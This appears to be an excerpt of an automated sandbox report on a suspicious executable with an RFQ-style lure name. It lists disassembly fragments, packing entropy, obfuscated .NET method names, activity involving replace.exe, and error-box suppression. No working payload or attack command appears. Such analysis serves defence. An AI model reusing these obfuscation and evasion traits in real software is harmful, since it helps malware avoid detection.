            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D8676F pushad ; retf 0_2_07D8677D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D86847 push esp; retf 0_2_07D86855
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00416023 push ds; ret 2_2_00416071
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00404834 push ebx; ret 2_2_00404835
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040A036 push es; ret 2_2_0040A039
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004119A0 pushfd ; iretd 2_2_004119B2
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00409A42 push ecx; ret 2_2_00409A46
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040D276 push ebx; retf 2_2_0040D29A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040D214 push ecx; iretd 2_2_0040D215
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00418B17 push ss; retf 2_2_00418B1B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004074E7 pushad ; iretd 2_2_004074F3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00403490 push eax; ret 2_2_00403492
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00409D5A push cs; retf 2_2_00409D5B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00406524 push es; iretd 2_2_00406530
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004145D8 pushfd ; ret 2_2_004145D9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040CE54 push cs; iretd 2_2_0040CE5B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0139225F pushad ; ret 2_2_013927F9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013927FA pushad ; ret 2_2_013927F9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01399939 push es; iretd 2_2_01399940
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C09AD push ecx; mov dword ptr [esp], ecx2_2_013C09B6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0139283D push eax; iretd 2_2_01392858
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0316225F pushad ; ret 5_2_031627F9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031627FA pushad ; ret 5_2_031627F9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031909AD push ecx; mov dword ptr [esp], ecx5_2_031909B6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0316283D push eax; iretd 5_2_03162858
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03161368 push eax; iretd 5_2_03161369
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: section name: .text entropy: 7.96453329112393
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, YoSM6Wp2IrmhKrj3ZC.csHigh entropy of concatenated method names: 'EHpkOZGoim', 'WA1kLrXTxA', 'KAwkw91x1C', 'aXAkaIv7QY', 'oyaksa6BYE', 'ClbkI8eig4', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, uVaeFkcPeaH3ocHSEv0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h3ABspXNn4', 'bprB6oEHSI', 'OOwBhWr7FM', 'qslB2At04s', 'JNlBRH3Aso', 'ylhBxsepID', 'LGOBdMLWa6'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, XIpVv9AC41Lf2l6L2Q.csHigh entropy of concatenated method names: 'buojqmtYbm', 'LlojXKNTWv', 'CUUjmU9wpL', 'idLm5VJxhU', 'p2mmzMhrcr', 'MqljNyE9lA', 'xePjJ4ybse', 'wTMj3qPZl1', 'sQxjy54DYA', 'DM0jTyba28'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, yR7kGq657qmGnh4tKL.csHigh entropy of concatenated method names: 'Dispose', 'rt7JecR04u', 'vPl3LjlNpq', 'Mya44ixB1G', 'TG4J5Nl5ID', 'ERhJzRwAix', 'ProcessDialogKey', 'ViF3NgEZAV', 'CAt3JRHo3Y', 'kbU337WtIm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, MYD0nFMdGQovafxJ7Z.csHigh entropy of concatenated method names: 'ToString', 'TXg7ENvWeS', 'dG17LdNH2W', 'RH17wjMabu', 'gVC7ar2iUl', 'fpt7INJBos', 'k7D7FOv6Zx', 'x0G7SN6d4H', 'UfC7iXNd2H', 'JiD7p8YshM'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, F6hFYiiBiVNM4n0oqc.csHigh entropy of concatenated method names: 'w0Pyco7jh7', 'nQMyqKQ0CB', 'JU3yPigGWy', 'fK2yX0Tmbq', 'L1OyYsdiWV', 'tUcymZSjEr', 'd9KyjFcQbs', 'mYvyUcW6O4', 'z7UyGZvsFt', 'cXcyChiKNm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, v1EZnFxqBBh6XGqBr0.csHigh entropy of concatenated method names: 'ga7JjlR6FY', 'bOqJU3jPNZ', 'HNAJC2px6b', 'exJJHlHYga', 'TLfJKV4JKO', 'hSPJ7Cx93G', 'K4CWXHXaqrx2gKV2CN', 'Kb7wV8IIRBUbVtH4nt', 'qfL18rE5SgLOYfGNeO', 'z68JJQ1JoN'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, ynG9sBnaZATAKmVTe7.csHigh entropy of concatenated method names: 'aK41hKnqs', 'gEiZ7GbsC', 'IhX9M8pPa', 'dJi8lPsuF', 'z9tAIhOVH', 'b8juMXYIt', 'jcnDVa0umTBv8BGfWG', 'aJ6Xhf27CApeSBSRRh', 'NL2kZUIWP', 'I7yBpceb2'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, bcqsqkytaUAL9e8ErJ.csHigh entropy of concatenated method names: 'SXkoJ5XlMN', 'CPMoyaxOBX', 'tBUoT5y3q9', 'yV6oqWBaS5', 'VG7oPi6Z88', 'ElPoYlRwDR', 'xHDomnhDYP', 'BTBkdRC1EA', 'AMrkv5qsnA', 'xUJket4wiQ'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, rDIp5G8onoljg2aKqn.csHigh entropy of concatenated method names: 'GyEPsNGmbc', 'AeKP60Dcmb', 'fIQPhkuffT', 'r8kP2QiRoi', 'IFOPRb9hr3', 'i8KPx6pawM', 'ab2PdaQLtM', 'uPrPvfrUkR', 'PEePey8bVA', 'yFhP5KOi9N'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, KJLWMFUAwl9EjQ3Nxn.csHigh entropy of concatenated method names: 'pPZkqFnMuO', 'gKtkPlZJyb', 'fyOkX3Ypin', 'WMOkYIcsRd', 'uD3km0phmX', 'srRkjXBgAq', 'dIKkUuJ25Y', 'TWtkGqLEyw', 'VASkCJDl12', 'IhCkHVp5fj'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, ySKAX7gAV1CMZRPs6r.csHigh entropy of concatenated method names: 'uTOXZij8dh', 'r4qX9kwnlq', 'MVWXfxGigI', 'RWUXAwx6wh', 'UvyXKw7iD5', 'fShX7Z91Y4', 'WdBXtLkiQ6', 'dD3XkrQfFf', 'u7yXoaEKFj', 'VR7XBOUxXb'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, QSK4KUc4JILpZ3IpyRw.csHigh entropy of concatenated method names: 'VpqobrK9uA', 'rlVorSeCXt', 'G2oo1iR30C', 'NwRoZvZKd9', 'nCkonvFPUF', 'iYPo9ytsxA', 'kEco8oBvIe', 'ENGofls0qS', 'VPioAKXnss', 'gDvouoKYhp'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, uXWt4EzWmqvJcLS2dM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uiloM7MHuq', 'HRwoKmJojI', 'XHpo7RKDXT', 'x7Cot2jC8d', 'TRsokBIMEX', 'eG3oonQSXG', 'rLuoB7c2V9'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, grvkySDx2bMBUo2s1j.csHigh entropy of concatenated method names: 'Ii0tvRG7t9', 'KZft53SoFD', 'mJrkN6mqCr', 'APEkJDAwXq', 'vTOtEF0RNb', 't2rtDwfmRs', 'lSAtl1Vn71', 'oRIts0p6aB', 'NGbt6cqQcm', 's3AthSjkI6'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, GJJWFJkvd2VZBSbtjl.csHigh entropy of concatenated method names: 'jn8tCKY4Ck', 'EpitHys6B7', 'ToString', 'S40tqJnNbW', 'WettPrSuU5', 'Pa5tXD9rQB', 'mwitYiioBl', 'RnXtmwNDum', 'FTrtjtw5W8', 'd0ltU7gMUm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, A8gFw3myrZdLsbB0jH.csHigh entropy of concatenated method names: 'hGoKV6pOP2', 'sDTKD6DAZl', 'D4TKsanD9P', 'SasK63Llaa', 'WFxKLVIpSQ', 'MyXKwq2vTU', 'wNyKa0NaZX', 'etEKIpeQwt', 'A0jKFCyT2p', 'TCLKSLsBAh'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, mQ0RGZYiDcvttbn8xA.csHigh entropy of concatenated method names: 'l01MfqMb0E', 'qeHMA1vonM', 'ME5MOCN54K', 'mXbMLwjK0S', 'bAvMaMexpa', 'GqfMIdE1tK', 'TaHMSNopXT', 'x88Mi2sc0L', 'xoLMVWXQC5', 'zeBMEjCkaL'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, JtfGZgjgKQWLSBqGf3.csHigh entropy of concatenated method names: 'LbfmcoYk6u', 'MV4mPPCLnY', 'P5JmYVhp03', 'la1mjB4EAP', 'xMmmUGtyGI', 'rl5YRHNysM', 'c5OYxKt6JN', 'dbGYdNW8td', 'qmtYvMqXKX', 'frYYeddTyN'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, bTPDcirfT3DGP9qfd1.csHigh entropy of concatenated method names: 'yPwYn0ZEad', 'ckJY8sQgtx', 'X2EXw7jaGY', 'yqJXaRAPmK', 'WrNXIEehvy', 'tNsXFB1nT7', 'rpmXSEgCcO', 'Xt6XiBYCTH', 'xKBXppOemy', 'AEjXVowRsU'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, MDFNbnfWwmWjgD7ikE.csHigh entropy of concatenated method names: 'EZjjbluCTR', 'rcWjrtlD8U', 'ALDj1TjIys', 'zhyjZtkuHb', 'GCQjnFDD2h', 'KUsj9EVZR5', 'c0dj8Eynfa', 'HT6jfnLUrW', 'Jk7jAleOSw', 'z0hjudJV8m'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, YoSM6Wp2IrmhKrj3ZC.csHigh entropy of concatenated method names: 'EHpkOZGoim', 'WA1kLrXTxA', 'KAwkw91x1C', 'aXAkaIv7QY', 'oyaksa6BYE', 'ClbkI8eig4', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, uVaeFkcPeaH3ocHSEv0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h3ABspXNn4', 'bprB6oEHSI', 'OOwBhWr7FM', 'qslB2At04s', 'JNlBRH3Aso', 'ylhBxsepID', 'LGOBdMLWa6'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, XIpVv9AC41Lf2l6L2Q.csHigh entropy of concatenated method names: 'buojqmtYbm', 'LlojXKNTWv', 'CUUjmU9wpL', 'idLm5VJxhU', 'p2mmzMhrcr', 'MqljNyE9lA', 'xePjJ4ybse', 'wTMj3qPZl1', 'sQxjy54DYA', 'DM0jTyba28'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, yR7kGq657qmGnh4tKL.csHigh entropy of concatenated method names: 'Dispose', 'rt7JecR04u', 'vPl3LjlNpq', 'Mya44ixB1G', 'TG4J5Nl5ID', 'ERhJzRwAix', 'ProcessDialogKey', 'ViF3NgEZAV', 'CAt3JRHo3Y', 'kbU337WtIm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, MYD0nFMdGQovafxJ7Z.csHigh entropy of concatenated method names: 'ToString', 'TXg7ENvWeS', 'dG17LdNH2W', 'RH17wjMabu', 'gVC7ar2iUl', 'fpt7INJBos', 'k7D7FOv6Zx', 'x0G7SN6d4H', 'UfC7iXNd2H', 'JiD7p8YshM'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, F6hFYiiBiVNM4n0oqc.csHigh entropy of concatenated method names: 'w0Pyco7jh7', 'nQMyqKQ0CB', 'JU3yPigGWy', 'fK2yX0Tmbq', 'L1OyYsdiWV', 'tUcymZSjEr', 'd9KyjFcQbs', 'mYvyUcW6O4', 'z7UyGZvsFt', 'cXcyChiKNm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, v1EZnFxqBBh6XGqBr0.csHigh entropy of concatenated method names: 'ga7JjlR6FY', 'bOqJU3jPNZ', 'HNAJC2px6b', 'exJJHlHYga', 'TLfJKV4JKO', 'hSPJ7Cx93G', 'K4CWXHXaqrx2gKV2CN', 'Kb7wV8IIRBUbVtH4nt', 'qfL18rE5SgLOYfGNeO', 'z68JJQ1JoN'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, ynG9sBnaZATAKmVTe7.csHigh entropy of concatenated method names: 'aK41hKnqs', 'gEiZ7GbsC', 'IhX9M8pPa', 'dJi8lPsuF', 'z9tAIhOVH', 'b8juMXYIt', 'jcnDVa0umTBv8BGfWG', 'aJ6Xhf27CApeSBSRRh', 'NL2kZUIWP', 'I7yBpceb2'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, bcqsqkytaUAL9e8ErJ.csHigh entropy of concatenated method names: 'SXkoJ5XlMN', 'CPMoyaxOBX', 'tBUoT5y3q9', 'yV6oqWBaS5', 'VG7oPi6Z88', 'ElPoYlRwDR', 'xHDomnhDYP', 'BTBkdRC1EA', 'AMrkv5qsnA', 'xUJket4wiQ'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, rDIp5G8onoljg2aKqn.csHigh entropy of concatenated method names: 'GyEPsNGmbc', 'AeKP60Dcmb', 'fIQPhkuffT', 'r8kP2QiRoi', 'IFOPRb9hr3', 'i8KPx6pawM', 'ab2PdaQLtM', 'uPrPvfrUkR', 'PEePey8bVA', 'yFhP5KOi9N'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, KJLWMFUAwl9EjQ3Nxn.csHigh entropy of concatenated method names: 'pPZkqFnMuO', 'gKtkPlZJyb', 'fyOkX3Ypin', 'WMOkYIcsRd', 'uD3km0phmX', 'srRkjXBgAq', 'dIKkUuJ25Y', 'TWtkGqLEyw', 'VASkCJDl12', 'IhCkHVp5fj'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, ySKAX7gAV1CMZRPs6r.csHigh entropy of concatenated method names: 'uTOXZij8dh', 'r4qX9kwnlq', 'MVWXfxGigI', 'RWUXAwx6wh', 'UvyXKw7iD5', 'fShX7Z91Y4', 'WdBXtLkiQ6', 'dD3XkrQfFf', 'u7yXoaEKFj', 'VR7XBOUxXb'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, QSK4KUc4JILpZ3IpyRw.csHigh entropy of concatenated method names: 'VpqobrK9uA', 'rlVorSeCXt', 'G2oo1iR30C', 'NwRoZvZKd9', 'nCkonvFPUF', 'iYPo9ytsxA', 'kEco8oBvIe', 'ENGofls0qS', 'VPioAKXnss', 'gDvouoKYhp'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, uXWt4EzWmqvJcLS2dM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uiloM7MHuq', 'HRwoKmJojI', 'XHpo7RKDXT', 'x7Cot2jC8d', 'TRsokBIMEX', 'eG3oonQSXG', 'rLuoB7c2V9'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, grvkySDx2bMBUo2s1j.csHigh entropy of concatenated method names: 'Ii0tvRG7t9', 'KZft53SoFD', 'mJrkN6mqCr', 'APEkJDAwXq', 'vTOtEF0RNb', 't2rtDwfmRs', 'lSAtl1Vn71', 'oRIts0p6aB', 'NGbt6cqQcm', 's3AthSjkI6'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, GJJWFJkvd2VZBSbtjl.csHigh entropy of concatenated method names: 'jn8tCKY4Ck', 'EpitHys6B7', 'ToString', 'S40tqJnNbW', 'WettPrSuU5', 'Pa5tXD9rQB', 'mwitYiioBl', 'RnXtmwNDum', 'FTrtjtw5W8', 'd0ltU7gMUm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, A8gFw3myrZdLsbB0jH.csHigh entropy of concatenated method names: 'hGoKV6pOP2', 'sDTKD6DAZl', 'D4TKsanD9P', 'SasK63Llaa', 'WFxKLVIpSQ', 'MyXKwq2vTU', 'wNyKa0NaZX', 'etEKIpeQwt', 'A0jKFCyT2p', 'TCLKSLsBAh'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, mQ0RGZYiDcvttbn8xA.csHigh entropy of concatenated method names: 'l01MfqMb0E', 'qeHMA1vonM', 'ME5MOCN54K', 'mXbMLwjK0S', 'bAvMaMexpa', 'GqfMIdE1tK', 'TaHMSNopXT', 'x88Mi2sc0L', 'xoLMVWXQC5', 'zeBMEjCkaL'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, JtfGZgjgKQWLSBqGf3.csHigh entropy of concatenated method names: 'LbfmcoYk6u', 'MV4mPPCLnY', 'P5JmYVhp03', 'la1mjB4EAP', 'xMmmUGtyGI', 'rl5YRHNysM', 'c5OYxKt6JN', 'dbGYdNW8td', 'qmtYvMqXKX', 'frYYeddTyN'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, bTPDcirfT3DGP9qfd1.csHigh entropy of concatenated method names: 'yPwYn0ZEad', 'ckJY8sQgtx', 'X2EXw7jaGY', 'yqJXaRAPmK', 'WrNXIEehvy', 'tNsXFB1nT7', 'rpmXSEgCcO', 'Xt6XiBYCTH', 'xKBXppOemy', 'AEjXVowRsU'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, MDFNbnfWwmWjgD7ikE.csHigh entropy of concatenated method names: 'EZjjbluCTR', 'rcWjrtlD8U', 'ALDj1TjIys', 'zhyjZtkuHb', 'GCQjnFDD2h', 'KUsj9EVZR5', 'c0dj8Eynfa', 'HT6jfnLUrW', 'Jk7jAleOSw', 'z0hjudJV8m'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, YoSM6Wp2IrmhKrj3ZC.csHigh entropy of concatenated method names: 'EHpkOZGoim', 'WA1kLrXTxA', 'KAwkw91x1C', 'aXAkaIv7QY', 'oyaksa6BYE', 'ClbkI8eig4', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, uVaeFkcPeaH3ocHSEv0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h3ABspXNn4', 'bprB6oEHSI', 'OOwBhWr7FM', 'qslB2At04s', 'JNlBRH3Aso', 'ylhBxsepID', 'LGOBdMLWa6'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, XIpVv9AC41Lf2l6L2Q.csHigh entropy of concatenated method names: 'buojqmtYbm', 'LlojXKNTWv', 'CUUjmU9wpL', 'idLm5VJxhU', 'p2mmzMhrcr', 'MqljNyE9lA', 'xePjJ4ybse', 'wTMj3qPZl1', 'sQxjy54DYA', 'DM0jTyba28'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, yR7kGq657qmGnh4tKL.csHigh entropy of concatenated method names: 'Dispose', 'rt7JecR04u', 'vPl3LjlNpq', 'Mya44ixB1G', 'TG4J5Nl5ID', 'ERhJzRwAix', 'ProcessDialogKey', 'ViF3NgEZAV', 'CAt3JRHo3Y', 'kbU337WtIm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, MYD0nFMdGQovafxJ7Z.csHigh entropy of concatenated method names: 'ToString', 'TXg7ENvWeS', 'dG17LdNH2W', 'RH17wjMabu', 'gVC7ar2iUl', 'fpt7INJBos', 'k7D7FOv6Zx', 'x0G7SN6d4H', 'UfC7iXNd2H', 'JiD7p8YshM'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, F6hFYiiBiVNM4n0oqc.csHigh entropy of concatenated method names: 'w0Pyco7jh7', 'nQMyqKQ0CB', 'JU3yPigGWy', 'fK2yX0Tmbq', 'L1OyYsdiWV', 'tUcymZSjEr', 'd9KyjFcQbs', 'mYvyUcW6O4', 'z7UyGZvsFt', 'cXcyChiKNm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, v1EZnFxqBBh6XGqBr0.csHigh entropy of concatenated method names: 'ga7JjlR6FY', 'bOqJU3jPNZ', 'HNAJC2px6b', 'exJJHlHYga', 'TLfJKV4JKO', 'hSPJ7Cx93G', 'K4CWXHXaqrx2gKV2CN', 'Kb7wV8IIRBUbVtH4nt', 'qfL18rE5SgLOYfGNeO', 'z68JJQ1JoN'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, ynG9sBnaZATAKmVTe7.csHigh entropy of concatenated method names: 'aK41hKnqs', 'gEiZ7GbsC', 'IhX9M8pPa', 'dJi8lPsuF', 'z9tAIhOVH', 'b8juMXYIt', 'jcnDVa0umTBv8BGfWG', 'aJ6Xhf27CApeSBSRRh', 'NL2kZUIWP', 'I7yBpceb2'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, bcqsqkytaUAL9e8ErJ.csHigh entropy of concatenated method names: 'SXkoJ5XlMN', 'CPMoyaxOBX', 'tBUoT5y3q9', 'yV6oqWBaS5', 'VG7oPi6Z88', 'ElPoYlRwDR', 'xHDomnhDYP', 'BTBkdRC1EA', 'AMrkv5qsnA', 'xUJket4wiQ'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, rDIp5G8onoljg2aKqn.csHigh entropy of concatenated method names: 'GyEPsNGmbc', 'AeKP60Dcmb', 'fIQPhkuffT', 'r8kP2QiRoi', 'IFOPRb9hr3', 'i8KPx6pawM', 'ab2PdaQLtM', 'uPrPvfrUkR', 'PEePey8bVA', 'yFhP5KOi9N'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, KJLWMFUAwl9EjQ3Nxn.csHigh entropy of concatenated method names: 'pPZkqFnMuO', 'gKtkPlZJyb', 'fyOkX3Ypin', 'WMOkYIcsRd', 'uD3km0phmX', 'srRkjXBgAq', 'dIKkUuJ25Y', 'TWtkGqLEyw', 'VASkCJDl12', 'IhCkHVp5fj'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, ySKAX7gAV1CMZRPs6r.csHigh entropy of concatenated method names: 'uTOXZij8dh', 'r4qX9kwnlq', 'MVWXfxGigI', 'RWUXAwx6wh', 'UvyXKw7iD5', 'fShX7Z91Y4', 'WdBXtLkiQ6', 'dD3XkrQfFf', 'u7yXoaEKFj', 'VR7XBOUxXb'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, QSK4KUc4JILpZ3IpyRw.csHigh entropy of concatenated method names: 'VpqobrK9uA', 'rlVorSeCXt', 'G2oo1iR30C', 'NwRoZvZKd9', 'nCkonvFPUF', 'iYPo9ytsxA', 'kEco8oBvIe', 'ENGofls0qS', 'VPioAKXnss', 'gDvouoKYhp'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, uXWt4EzWmqvJcLS2dM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uiloM7MHuq', 'HRwoKmJojI', 'XHpo7RKDXT', 'x7Cot2jC8d', 'TRsokBIMEX', 'eG3oonQSXG', 'rLuoB7c2V9'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, grvkySDx2bMBUo2s1j.csHigh entropy of concatenated method names: 'Ii0tvRG7t9', 'KZft53SoFD', 'mJrkN6mqCr', 'APEkJDAwXq', 'vTOtEF0RNb', 't2rtDwfmRs', 'lSAtl1Vn71', 'oRIts0p6aB', 'NGbt6cqQcm', 's3AthSjkI6'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, GJJWFJkvd2VZBSbtjl.csHigh entropy of concatenated method names: 'jn8tCKY4Ck', 'EpitHys6B7', 'ToString', 'S40tqJnNbW', 'WettPrSuU5', 'Pa5tXD9rQB', 'mwitYiioBl', 'RnXtmwNDum', 'FTrtjtw5W8', 'd0ltU7gMUm'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, A8gFw3myrZdLsbB0jH.csHigh entropy of concatenated method names: 'hGoKV6pOP2', 'sDTKD6DAZl', 'D4TKsanD9P', 'SasK63Llaa', 'WFxKLVIpSQ', 'MyXKwq2vTU', 'wNyKa0NaZX', 'etEKIpeQwt', 'A0jKFCyT2p', 'TCLKSLsBAh'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, mQ0RGZYiDcvttbn8xA.csHigh entropy of concatenated method names: 'l01MfqMb0E', 'qeHMA1vonM', 'ME5MOCN54K', 'mXbMLwjK0S', 'bAvMaMexpa', 'GqfMIdE1tK', 'TaHMSNopXT', 'x88Mi2sc0L', 'xoLMVWXQC5', 'zeBMEjCkaL'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, JtfGZgjgKQWLSBqGf3.csHigh entropy of concatenated method names: 'LbfmcoYk6u', 'MV4mPPCLnY', 'P5JmYVhp03', 'la1mjB4EAP', 'xMmmUGtyGI', 'rl5YRHNysM', 'c5OYxKt6JN', 'dbGYdNW8td', 'qmtYvMqXKX', 'frYYeddTyN'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, bTPDcirfT3DGP9qfd1.csHigh entropy of concatenated method names: 'yPwYn0ZEad', 'ckJY8sQgtx', 'X2EXw7jaGY', 'yqJXaRAPmK', 'WrNXIEehvy', 'tNsXFB1nT7', 'rpmXSEgCcO', 'Xt6XiBYCTH', 'xKBXppOemy', 'AEjXVowRsU'
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, MDFNbnfWwmWjgD7ikE.csHigh entropy of concatenated method names: 'EZjjbluCTR', 'rcWjrtlD8U', 'ALDj1TjIys', 'zhyjZtkuHb', 'GCQjnFDD2h', 'KUsj9EVZR5', 'c0dj8Eynfa', 'HT6jfnLUrW', 'Jk7jAleOSw', 'z0hjudJV8m'
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
